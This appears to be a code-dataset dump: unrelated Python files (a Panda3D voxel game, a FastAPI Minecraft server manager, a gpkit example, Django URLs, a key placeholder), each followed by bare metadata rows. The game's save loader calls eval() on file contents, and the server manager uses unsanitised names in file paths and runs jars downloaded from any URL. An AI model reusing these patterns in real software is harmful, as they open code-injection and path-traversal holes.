        ### Validate parameters.
        if db_context is None:
            raise Exception('db_context cannot be None.')

        ### Attributes from outside.
        self._db_context = db_context
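A minimal usage sketch of the record above; the DbContext stub is hypothetical (the real class lives elsewhere in the repository) and only shows that construction fails fast when the context is missing:

class DbContext:  # hypothetical stub standing in for the repo's real DbContext
    pass

deleter = Deleter(DbContext())   # succeeds; the context is stored on the instance

try:
    Deleter(None)                # the guard in __init__ rejects a missing context
except Exception as error:
    print(error)                 # -> db_context cannot be None.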
29.826087
120
0.355685
42
686
5.547619
0.642857
0.23176
0.111588
0
0
0
0
0
0
0
0
0
0.244898
686
22
121
31.181818
0.449807
0.244898
0
0
0
0
0.116071
0
0
0
0
0
0
1
0.2
false
0
0
0
0.4
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
8231f730c04eb4d6e810e9c69386be194b173415
16,027
py
Python
main.py
PlumpMath/Panda3DCraft
7bf5b658af7809249c6bc78d059506e738546812
[ "MIT" ]
1
2021-08-07T14:05:27.000Z
2021-08-07T14:05:27.000Z
main.py
PlumpMath/Panda3DCraft
7bf5b658af7809249c6bc78d059506e738546812
[ "MIT" ]
null
null
null
main.py
PlumpMath/Panda3DCraft
7bf5b658af7809249c6bc78d059506e738546812
[ "MIT" ]
1
2021-08-15T14:50:47.000Z
2021-08-15T14:50:47.000Z
from panda3d.core import * from direct.gui.DirectGui import * from direct.showbase.ShowBase import ShowBase from noise import snoise2 import os import random from Block import * loadPrcFile('config/general.prc') if __debug__: loadPrcFile('config/dev.prc') base = ShowBase() octavesElev = 5 octavesRough = 2 octavesDetail = 1 freq = 16.0 * octavesElev world = {} verboseLogging = False fancyRendering = False wantNewGeneration = False fillWorld = False base.setFrameRateMeter(True) paused = False inventory = [DIRT, COBBLESTONE, GLASS, GRASS, BRICKS, WOOD, LEAVES, PLANKS, STONE] currentBlock = inventory[0] currentSelectedText = DirectLabel(text = "Current block:", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = aspect2d, scale = 0.05, pos = (0,0,-0.9)) currentBlockText = DirectLabel(text = blockNames[currentBlock], text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = aspect2d, scale = 0.05, pos = (0,0,-0.95)) def pause(): global paused paused = not paused if paused: base.disableMouse() pauseScreen.showPause() else: base.enableMouse() pauseScreen.hide() class PauseScreen: def __init__(self): self.pauseScr = aspect2d.attachNewNode("pause") # This is used so that everything can be stashed at once... except for dim, which is on render2d self.loadScr = aspect2d.attachNewNode("load") # It also helps for flipping between screens self.saveScr = aspect2d.attachNewNode("save") cm = CardMaker('card') self.dim = render2d.attachNewNode(cm.generate()) self.dim.setPos(-1, 0, -1) self.dim.setScale(2) self.dim.setTransparency(1) self.dim.setColor(0, 0, 0, 0.5) self.buttonModel = loader.loadModel('gfx/button') inputTexture = loader.loadTexture('gfx/tex/button_press.png') # Pause Screen self.unpauseButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, 0.3), text = "Resume Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = pause) self.saveButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, 0.15), text = "Save Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showSave) self.loadButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, -0.15), text = "Load Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showLoad) self.exitButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, -0.3), text = "Quit Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = exit) # Save Screen self.saveText = DirectLabel(text = "Type in a name for your world", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.saveScr, scale = 0.075, pos = (0,0,0.35)) self.saveText2 = DirectLabel(text = "", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.saveScr, scale = 0.06, pos = (0,0,-0.45)) 
self.saveName = DirectEntry(text = "", scale= .15, command=self.save, initialText="My World", numLines = 1, focus=1, frameTexture = inputTexture, parent = self.saveScr, text_fg = (1,1,1,1), pos = (-0.6, 0, 0.1), text_scale = 0.75) self.saveGameBtn = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.saveScr, scale = 0.5, pos = (0, 0, -0.1), text = "Save", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.save) self.backButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.saveScr, scale = 0.5, pos = (0, 0, -0.25), text = "Back", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showPause) # Load Screen numItemsVisible = 3 itemHeight = 0.15 self.loadList = DirectScrolledList( decButton_pos= (0.35, 0, 0.5), decButton_text = "^", decButton_text_scale = 0.04, decButton_text_pos = (0, -0.025), decButton_text_fg = (1, 1, 1, 1), decButton_borderWidth = (0.005, 0.005), decButton_scale = (1.5, 1, 2), decButton_geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), decButton_geom_scale = 0.1, decButton_relief = None, incButton_pos= (0.35, 0, 0), incButton_text = "^", incButton_text_scale = 0.04, incButton_text_pos = (0, -0.025), incButton_text_fg = (1, 1, 1, 1), incButton_borderWidth = (0.005, 0.005), incButton_hpr = (0,180,0), incButton_scale = (1.5, 1, 2), incButton_geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), incButton_geom_scale = 0.1, incButton_relief = None, frameSize = (-0.4, 1.1, -0.1, 0.59), frameTexture = inputTexture, frameColor = (1, 1, 1, 0.75), pos = (-0.45, 0, -0.25), scale = 1.25, numItemsVisible = numItemsVisible, forceHeight = itemHeight, itemFrame_frameSize = (-0.2, 0.2, -0.37, 0.11), itemFrame_pos = (0.35, 0, 0.4), itemFrame_frameColor = (0,0,0,0), parent = self.loadScr ) self.backButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.loadScr, scale = 0.5, pos = (0, 0, -0.5), text = "Back", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showPause) self.loadText = DirectLabel(text = "Select World", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.loadScr, scale = 0.075, pos = (0,0,0.55)) self.loadText2 = DirectLabel(text = "", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.loadScr, scale = 0.075, pos = (0,0,-0.7)) self.hide() def showPause(self): self.saveScr.stash() self.loadScr.stash() self.pauseScr.unstash() self.dim.unstash() def showSave(self): self.pauseScr.stash() self.saveScr.unstash() self.saveText2['text'] = "" def showLoad(self): self.pauseScr.stash() self.loadScr.unstash() self.loadText2['text'] = "" self.loadList.removeAndDestroyAllItems() f = [] if not os.path.exists('saves/'): os.makedirs('saves/') for (dirpath, dirnames, filenames) in os.walk('saves/'): f.extend(filenames) break for file in f: l = 
DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, scale = 0.5, pos = (0, 0, -0.75), text = file.strip('.sav'), text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.load, extraArgs = [file]) self.loadList.addItem(l) def save(self, worldName = None): self.saveText2['text'] = "Saving..." if worldName == None: worldName = self.saveName.get(True) print "Saving %s..." % worldName dest = 'saves/%s.sav' % worldName dir = os.path.dirname(dest) if not os.path.exists(dir): os.makedirs(dir) try: f = open(dest, 'wt') except IOError: self.saveText2['text'] = "Could not save. Make sure the world name does not contain the following characters: \\ / : * ? \" < > |" print "Failed!" return for key in world: if world[key].type == AIR: continue f.write(str(key) + ':') f.write(str(world[key].type) + '\n') f.close() self.saveText2['text'] = "Saved!" print "Saved!" def load(self, worldName): self.loadText2['text'] = "Loading..." print "Loading..." f = open('saves/%s' % worldName, 'r') toLoad = f.read().split('\n') toLoad.pop() # get rid of newline for key in world: addBlock(AIR, key[0], key[1], key[2]) world.clear() for key in toLoad: key = key.split(':') posTup = eval(key[0]) addBlock(int(key[1]), posTup[0], posTup[1], posTup[2]) f.close() self.loadText2['text'] = "Loaded!" print "Loaded!" def hide(self): self.pauseScr.stash() self.loadScr.stash() self.saveScr.stash() self.dim.stash() pauseScreen = PauseScreen() def addBlock(blockType,x,y,z): try: world[(x,y,z)].cleanup() except: pass block = Block(blockType, x, y, z) world[(x,y,z)] = block return for x in xrange(0, 16): for y in xrange(0, 16): amplitude = random.randrange(0.0,5.0) blockType = DIRT if wantNewGeneration: z = max(min(int(snoise2(x / freq, y / freq, octavesElev)+(snoise2(x / freq, y / freq, octavesRough)*snoise2(x / freq, y / freq, octavesDetail))*64+64), 128), 0) addBlock(blockType,x,y,z) else: z = max((int(snoise2(x / freq, y / freq, 5) * amplitude)+8), 0) addBlock(blockType,x,y,z) if fillWorld: for height in xrange(0, z+1): addBlock(blockType,x,y,height) if verboseLogging: print "Generated %s at (%d, %d, %d)" % (blockNames[blockType], x, y, z) alight = AmbientLight('alight') alight.setColor(VBase4(0.6, 0.6, 0.6, 1)) alnp = render.attachNewNode(alight) render.setLight(alnp) slight = Spotlight('slight') slight.setColor(VBase4(1, 1, 1, 1)) lens = PerspectiveLens() slight.setLens(lens) slnp = render.attachNewNode(slight) slnp.setPos(8, -9, 128) slnp.setHpr(0,270,0) render.setLight(slnp) if fancyRendering: # Use a 512x512 resolution shadow map slight.setShadowCaster(True, 512, 512) # Enable the shader generator for the receiving nodes render.setShaderAuto() traverser = CollisionTraverser() handler = CollisionHandlerQueue() pickerNode = CollisionNode('mouseRay') pickerNP = camera.attachNewNode(pickerNode) pickerNode.setFromCollideMask(GeomNode.getDefaultCollideMask()) pickerRay = CollisionRay() pickerNode.addSolid(pickerRay) traverser.addCollider(pickerNP, handler) def handlePick(right=False): if paused: return # no if base.mouseWatcherNode.hasMouse(): mpos = base.mouseWatcherNode.getMouse() pickerRay.setFromLens(base.camNode, mpos.getX(), mpos.getY()) traverser.traverse(render) if handler.getNumEntries() > 0: handler.sortEntries() pickedObj = handler.getEntry(0).getIntoNodePath() pickedObj = pickedObj.findNetTag('blockTag') if not pickedObj.isEmpty(): if right: 
handleRightPickedObject(pickedObj, handler.getEntry(0).getIntoNodePath().findNetTag('westTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('northTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('eastTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('southTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('topTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('botTag').isEmpty()) else: handlePickedObject(pickedObj) def hotbarSelect(slot): global currentBlock currentBlock = inventory[slot-1] currentBlockText["text"] = blockNames[currentBlock] if verboseLogging: print "Selected hotbar slot %d" % slot print "Current block: %s" % blockNames[currentBlock] base.accept('mouse1', handlePick) base.accept('mouse3', handlePick, extraArgs=[True]) base.accept('escape', pause) base.accept('1', hotbarSelect, extraArgs=[1]) base.accept('2', hotbarSelect, extraArgs=[2]) base.accept('3', hotbarSelect, extraArgs=[3]) base.accept('4', hotbarSelect, extraArgs=[4]) base.accept('5', hotbarSelect, extraArgs=[5]) base.accept('6', hotbarSelect, extraArgs=[6]) base.accept('7', hotbarSelect, extraArgs=[7]) base.accept('8', hotbarSelect, extraArgs=[8]) base.accept('9', hotbarSelect, extraArgs=[9]) def handlePickedObject(obj): if verboseLogging: print "Left clicked a block at %d, %d, %d" % (obj.getX(), obj.getY(), obj.getZ()) addBlock(AIR, obj.getX(), obj.getY(), obj.getZ()) def handleRightPickedObject(obj, west, north, east, south, top, bot): if verboseLogging: print "Right clicked a block at %d, %d, %d, attempting to place %s" % (obj.getX(), obj.getY(), obj.getZ(), blockNames[currentBlock]) try: # not [block face] checks to see if the user clicked on [block face]. this is not confusing at all. if world[(obj.getX()-1, obj.getY(), obj.getZ())].type == AIR and not west: addBlock(currentBlock, obj.getX()-1, obj.getY(), obj.getZ()) elif world[(obj.getX()+1, obj.getY(), obj.getZ())].type == AIR and not east: addBlock(currentBlock, obj.getX()+1, obj.getY(), obj.getZ()) elif world[(obj.getX(), obj.getY()-1, obj.getZ())].type == AIR and not south: addBlock(currentBlock, obj.getX(), obj.getY()-1, obj.getZ()) elif world[(obj.getX(), obj.getY()+1, obj.getZ())].type == AIR and not north: addBlock(currentBlock, obj.getX(), obj.getY()+1, obj.getZ()) elif world[(obj.getX(), obj.getY(), obj.getZ()+1)].type == AIR and not top: addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()+1) elif world[(obj.getX(), obj.getY(), obj.getZ()-1)].type == AIR and not bot: addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()-1) except KeyError: if not west: addBlock(currentBlock, obj.getX()-1, obj.getY(), obj.getZ()) elif not east: addBlock(currentBlock, obj.getX()+1, obj.getY(), obj.getZ()) elif not south: addBlock(currentBlock, obj.getX(), obj.getY()-1, obj.getZ()) elif not north: addBlock(currentBlock, obj.getX(), obj.getY()+1, obj.getZ()) elif not top: addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()+1) elif not bot: addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()-1) fog = Fog("fog") fog.setColor(0.5294, 0.8078, 0.9215) fog.setExpDensity(0.015) render.setFog(fog) base.camLens.setFar(256) base.run()
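The record above is Python 2 (print statements, xrange) and has a couple of soft spots: the terrain loop calls random.randrange(0.0, 5.0) with floats where random.uniform appears intended, and addBlock ends in a redundant bare return. A hedged Python 3 port of just the generation loop, assuming snoise2, addBlock, blockNames, and the tuning globals defined earlier in the file:

# Hedged Python 3 port of the terrain-generation loop (assumes snoise2, addBlock,
# DIRT, blockNames, freq, octaves*, wantNewGeneration, fillWorld, verboseLogging
# from the original record).
import random

for x in range(16):                            # xrange -> range
    for y in range(16):
        amplitude = random.uniform(0.0, 5.0)   # uniform for a float amplitude; randrange is for integer ranges
        block_type = DIRT
        if wantNewGeneration:
            z = max(min(int(snoise2(x / freq, y / freq, octavesElev)
                            + snoise2(x / freq, y / freq, octavesRough)
                            * snoise2(x / freq, y / freq, octavesDetail) * 64 + 64), 128), 0)
        else:
            z = max(int(snoise2(x / freq, y / freq, 5) * amplitude) + 8, 0)
        addBlock(block_type, x, y, z)
        if fillWorld:
            for height in range(z + 1):
                addBlock(block_type, x, y, height)
        if verboseLogging:
            print("Generated %s at (%d, %d, %d)" % (blockNames[block_type], x, y, z))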
45.274011
217
0.608099
2,043
16,027
4.715125
0.190406
0.014118
0.078895
0.10381
0.432368
0.396242
0.346517
0.339147
0.335929
0.335929
0
0.043198
0.225806
16,027
353
218
45.402266
0.733156
0.023835
0
0.141414
0
0.037037
0.08328
0.001535
0
0
0
0
0
0
null
null
0.003367
0.023569
null
null
0.03367
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
8234be85b1a5c920b993e015367a06c4e394d65b
11,961
py
Python
main.py
iTecAI/minecraft-socket
72f3bbc4fb20bea4b837d093c734eab2798de89d
[ "MIT" ]
null
null
null
main.py
iTecAI/minecraft-socket
72f3bbc4fb20bea4b837d093c734eab2798de89d
[ "MIT" ]
null
null
null
main.py
iTecAI/minecraft-socket
72f3bbc4fb20bea4b837d093c734eab2798de89d
[ "MIT" ]
null
null
null
from json.decoder import JSONDecodeError from fastapi import FastAPI, Response, Request from fastapi.staticfiles import StaticFiles from argparse import ArgumentParser from starlette.status import * from starlette.responses import FileResponse, JSONResponse import uvicorn import os from pymongo import MongoClient from pymongo.database import Database import json from util import fetch_jarinfo, defaults import logging from logging import debug, info, warning, error, critical, exception import threading import time from models import * import hashlib import random import server_manager import requests import base64 AUTHENTICATED_CONNECTIONS = {} def fetch_loop(db: Database): WAIT = 12 # Delay between fetches (hours) while True: info('Fetching minecraft version info.') jar_info = fetch_jarinfo() jar_info['record'] = 'versions' info('Found {mc} vanilla versions and {paper} papermc versions. Latest version is {latest}. Latest snapshot is {latest_snap}.'.format( mc=str(len(jar_info['vanilla'])), paper=str(len(jar_info['paper'])), latest=jar_info['latest']['release'], latest_snap=jar_info['latest']['snapshot'] )) db.versions.replace_one({'record': 'versions'}, jar_info, upsert=True) time.sleep(WAIT * 3600) if __name__ == '__main__': parser = ArgumentParser(description='Run minecraft-socket server.') parser.add_argument('--config', default='config.json', help='Path to config file (JSON)') args = parser.parse_args() try: with open(args.config, 'r') as c: os.environ['MC-CONFIG'] = json.dumps(json.load(c)) except JSONDecodeError: print('FATAL: Bad JSON structure.') exit(0) except FileNotFoundError: print(f'FATAL: {args.config} not found.') exit(0) CONF = json.loads(os.environ['MC-CONFIG']) uvicorn.run('main:app', host=CONF['runtime']['host'], port=CONF['runtime']['port'], access_log=False) else: try: CONFIG = json.loads(os.environ['MC-CONFIG']) except: print(f'FATAL: config not loaded.') exit(0) logging.basicConfig( format=CONFIG["logging"]["format"], level=logging.getLevelName(CONFIG["logging"]["level"].upper()), ) info('Loading connection to DB') db = CONFIG['database'] mongodb = MongoClient( host=db['ip'], port=db['port'], username=db['username'], password=db['password'], tls=db['secure'] ) database = mongodb.minecraft_socket info('Starting fetch thread.') fetch_thread = threading.Thread(target=fetch_loop, name='mcjar_fetch_thread', daemon=True, args=[database]) fetch_thread.start() info('Checking env setup.') if not os.path.exists(CONFIG['server_folder']): os.makedirs(CONFIG['server_folder']) info('Starting server manager.') manager = server_manager.ServerManager(CONFIG['server_folder'], database) app = FastAPI() app.mount('/web', StaticFiles(directory='web'), 'staticfiles') @app.get('/') async def get_index(): return FileResponse(os.path.join('web', 'index.html')) @app.middleware('http') async def auth(request: Request, call_next): for k in list(AUTHENTICATED_CONNECTIONS.keys()): if AUTHENTICATED_CONNECTIONS[k]+CONFIG['connection_timeout'] < time.time(): del AUTHENTICATED_CONNECTIONS[k] if request.url.path == '/' or request.url.path.startswith('/web') or request.url.path == '/auth': return await call_next(request) else: if 'x-authkey' in request.headers.keys(): if request.headers['x-authkey'] in AUTHENTICATED_CONNECTIONS.keys(): return await call_next(request) else: return JSONResponse({'result': 'failure', 'reason': 'Auth key not recognized.'}, HTTP_403_FORBIDDEN) else: return JSONResponse({'result': 'failure', 'reason': 'Auth key not passed in headers.'}, HTTP_403_FORBIDDEN) @app.post('/auth') 
async def post_auth(request: Request, response: Response): model = await request.json() hashed_pass = hashlib.sha256(CONFIG['password'].encode('utf-8')).hexdigest() if hashed_pass == model['passhash']: cid = hashlib.sha256(str(time.time()+random.random()).encode('utf-8')).hexdigest() AUTHENTICATED_CONNECTIONS[cid] = time.time() return {'result': 'success', 'connection_id': cid} else: response.status_code = HTTP_403_FORBIDDEN return {'result': 'failure', 'reason': 'Incorrect passcode.'} @app.get('/versions') async def get_versions(response: Response, request: Request): try: res = database.versions.find_one({'record': 'versions'}) del res['_id'] del res['record'] return res except: return { 'latest': {'release': None, 'snapshot': None}, 'paper': {}, 'vanilla': {} } @app.post('/servers/new') async def new_server(req: Request, res: Response): fields = defaults(await req.json(), defs={ 'max_memory': 2, # GB 'name': f'server_{int(time.time())}', 'server_port': 25565, 'server_ip': '', 'world_seed': '', 'whitelist': True, 'max_players': 20, 'difficulty': 'hard', 'gamemode': 'survival', 'motd': 'Minecraft Server Running on Minecraft-Socket [iTecAI]', 'command_blocks': True, 'other_args': '' }) # also requires {jar: url or base-64 encoded jar} if os.path.exists(os.path.join(CONFIG['server_folder'], fields['name'])): res.status_code = HTTP_405_METHOD_NOT_ALLOWED return {'result': 'failure', 'reason': f'Server {fields["name"]} already exists.'} if not 'jar' in fields.keys(): res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Server jar not specified'} info(f'Creating new server {fields["name"]} running at {fields["server_ip"]}:{fields["server_port"]}.') os.mkdir(os.path.join(CONFIG['server_folder'], fields['name'])) with open(os.path.join(CONFIG['server_folder'], fields['name'], 'eula.txt'), 'w') as f: f.write('eula=true') with open('server.properties.template', 'r') as f: properties = f.read().format( gamemode=fields['gamemode'], cmdblocks='true' if fields['command_blocks'] else 'false', motd=fields['motd'], seed=fields['world_seed'], difficulty=fields['difficulty'], max_players=str(fields['max_players']), server_ip=fields['server_ip'], server_port=str(fields['server_port']), whitelist='true' if fields['whitelist'] else 'false' ) with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.properties'), 'w') as f: f.write(properties) database.servers.insert_one({ 'max_memory': fields['max_memory'], 'name': fields['name'], 'java_args': fields['other_args'], 'address': fields['server_ip']+':'+str(fields['server_port']), 'enabled': True }) if 'https://' in fields['jar'] or 'http://' in fields['jar']: response = requests.get(fields['jar'], stream=True) with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd: for chunk in response.iter_content(chunk_size=128): fd.write(chunk) else: with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd: fd.write(base64.b64decode(fields['jar'].split('base64,')[1].encode('utf-8'))) manager.start_server(fields['name']) return {'result': 'success'} @app.post('/servers/{name}/stop') async def stop_server(name: str, res: Response): try: manager.stop_server(name) return {'result': 'success'} except KeyError: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} not online.'} @app.post('/servers/{name}/delete') async def delete_server(name: str, res: Response): try: manager.stop_server(name) except KeyError: pass 
database.servers.delete_one({'name': name}) return {'result': 'success'} @app.get('/servers/{name}/logs') async def get_logs(name: str, res: Response): try: manager.get_logs(name) return {'result': 'success', 'logs': manager.get_logs(name)} except KeyError: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} not online.'} @app.post('/servers/{name}/command') async def command_server(name: str, res: Response, req: Request): fields = await req.json() if not 'command' in fields.keys(): res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Command not passed'} try: manager.command_server(name, fields['command']) except KeyError: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} not online.'} return {'result': 'success'} @app.post('/servers/{name}/start') async def start_server(name: str, res: Response): try: manager.start_server(name) except KeyError: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} not online.'} return {'result': 'success'} @app.post('/servers/{name}/modify_prop') async def start_server(name: str, res: Response, req: Request): fields = await req.json() if not 'content' in fields.keys(): res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Content not passed.'} if database.servers.find_one({'name': name}): with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'w') as f: f.write(fields['content']) else: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} does not exist.'} @app.post('/servers/{name}/modify_spec') async def start_server(name: str, res: Response, req: Request): fields = await req.json() if not 'content' in fields.keys(): res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Content not passed.'} if database.servers.find_one({'name': name}): try: database.servers.replace_one({'name': name}, json.loads(fields['content'])) return {'result': 'success'} except: res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Bad content format.'} else: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} does not exist.'} @app.get('/servers/{name}/') async def get_server_info(name: str, res: Response): spec = database.servers.find_one({'name': name}) if spec: del spec['_id'] with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'r') as f: props = f.read() return { 'result': 'success', 'spec': spec, 'prop': props, 'running': name in manager.servers.keys() } else: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} does not exist.'} @app.get('/servers') async def list_servers(): server_dict = {} for s in database.servers.find(): if os.path.exists(os.path.join(CONFIG['server_folder'], s['name'])): server_dict[s['name']] = { 'autostart': s['enabled'], 'running': s['name'] in manager.servers.keys(), 'address': s['address'], 'mem': s['max_memory'] } return server_dict
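Two observations on the record above: the last three handlers are all defined as start_server, so the later async def statements shadow the earlier names (FastAPI still registers each route at decoration time, but distinct names such as modify_prop_server would be clearer), and clients authenticate by posting the SHA-256 hex digest of the password, then sending the returned connection id in an x-authkey header. A minimal client sketch under those observed conventions; host, port, and password are placeholders:

import hashlib
import requests

BASE = "http://localhost:8000"   # placeholder host/port

# POST /auth with the SHA-256 hex digest of the password, as the server expects.
passhash = hashlib.sha256("hunter2".encode("utf-8")).hexdigest()
auth = requests.post(f"{BASE}/auth", json={"passhash": passhash}).json()
key = auth["connection_id"]

# Every other route checks the 'x-authkey' header against AUTHENTICATED_CONNECTIONS.
servers = requests.get(f"{BASE}/servers", headers={"x-authkey": key}).json()
print(servers)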
38.214058
142
0.621269
1,449
11,961
5.004831
0.198068
0.038058
0.041919
0.048263
0.338389
0.322532
0.295229
0.288748
0.273442
0.258825
0
0.009465
0.222724
11,961
313
143
38.214058
0.770571
0.006688
0
0.266904
0
0.003559
0.234804
0.018269
0
0
0
0
0
1
0.003559
false
0.032028
0.078292
0
0.192171
0.010676
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8235474f3f587b0e7b47abaf477920cd055a7941
82
py
Python
weather/weatherapi/key.py
Stephen-Kamau/Weather_Api
b9d70f564fe055dc1400dc49d856eed95a9603ee
[ "MIT" ]
1
2020-07-30T12:48:17.000Z
2020-07-30T12:48:17.000Z
weather/weatherapi/key.py
Stephen-Kamau/Weather_Api
b9d70f564fe055dc1400dc49d856eed95a9603ee
[ "MIT" ]
null
null
null
weather/weatherapi/key.py
Stephen-Kamau/Weather_Api
b9d70f564fe055dc1400dc49d856eed95a9603ee
[ "MIT" ]
null
null
null
# My OpenWeather API key, used to access the API's resources. api_key = "enter your key here"
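Hardcoding a key in source is easy to leak; a common alternative (a sketch, not part of the record — the variable name OPENWEATHER_API_KEY is illustrative) reads it from the environment:

import os

# Read the OpenWeather key from an environment variable instead of committing it.
api_key = os.environ.get("OPENWEATHER_API_KEY", "enter your key here")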
20.5
48
0.756098
15
82
4.066667
0.8
0.196721
0
0
0
0
0
0
0
0
0
0
0.195122
82
3
49
27.333333
0.924242
0.573171
0
0
0
0
0.575758
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
82371535c737935c03e91ede47e391e948acafe2
567
py
Python
docs/source/examples/simple_sp.py
giserh/gpkit
71b953fcac8f67f148b67b54b6e8cd4182dc0b3b
[ "MIT" ]
null
null
null
docs/source/examples/simple_sp.py
giserh/gpkit
71b953fcac8f67f148b67b54b6e8cd4182dc0b3b
[ "MIT" ]
null
null
null
docs/source/examples/simple_sp.py
giserh/gpkit
71b953fcac8f67f148b67b54b6e8cd4182dc0b3b
[ "MIT" ]
null
null
null
"""Adapted from t_SP in tests/t_geometric_program.py""" import gpkit # Decision variables x = gpkit.Variable('x') y = gpkit.Variable('y') # must enable signomials for subtraction with gpkit.SignomialsEnabled(): constraints = [x >= 1-y, y <= 0.1] # create and solve the SP m = gpkit.Model(x, constraints) print(m.localsolve(verbosity=0).summary()) assert abs(m.solution(x) - 0.9) < 1e-6 # full interim solutions are available print("x values of each GP solve (note convergence)") print(", ".join("%.5f" % sol["freevariables"][x] for sol in m.program.results))
28.35
79
0.705467
88
567
4.511364
0.659091
0.065491
0
0
0
0
0
0
0
0
0
0.018443
0.13933
567
19
80
29.842105
0.795082
0.29806
0
0
0
0
0.167095
0
0
0
0
0
0.1
1
0
false
0
0.1
0
0.1
0.3
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8237ae1f3b2386a6d8ebda2469e470afeb0c3eb1
140
py
Python
cride/circles/urls.py
jgmc3012/cride
19401b5c19aa706c9928c12195fd8303d75f1d49
[ "MIT" ]
null
null
null
cride/circles/urls.py
jgmc3012/cride
19401b5c19aa706c9928c12195fd8303d75f1d49
[ "MIT" ]
5
2020-06-30T21:41:49.000Z
2021-09-08T02:15:04.000Z
cride/circles/urls.py
jmillandev/cride
19401b5c19aa706c9928c12195fd8303d75f1d49
[ "MIT" ]
null
null
null
from django.urls import path from cride.circles.views import ListCreateAPIView urlpatterns = [ path('', ListCreateAPIView.as_view()) ]
20
49
0.764286
16
140
6.625
0.75
0
0
0
0
0
0
0
0
0
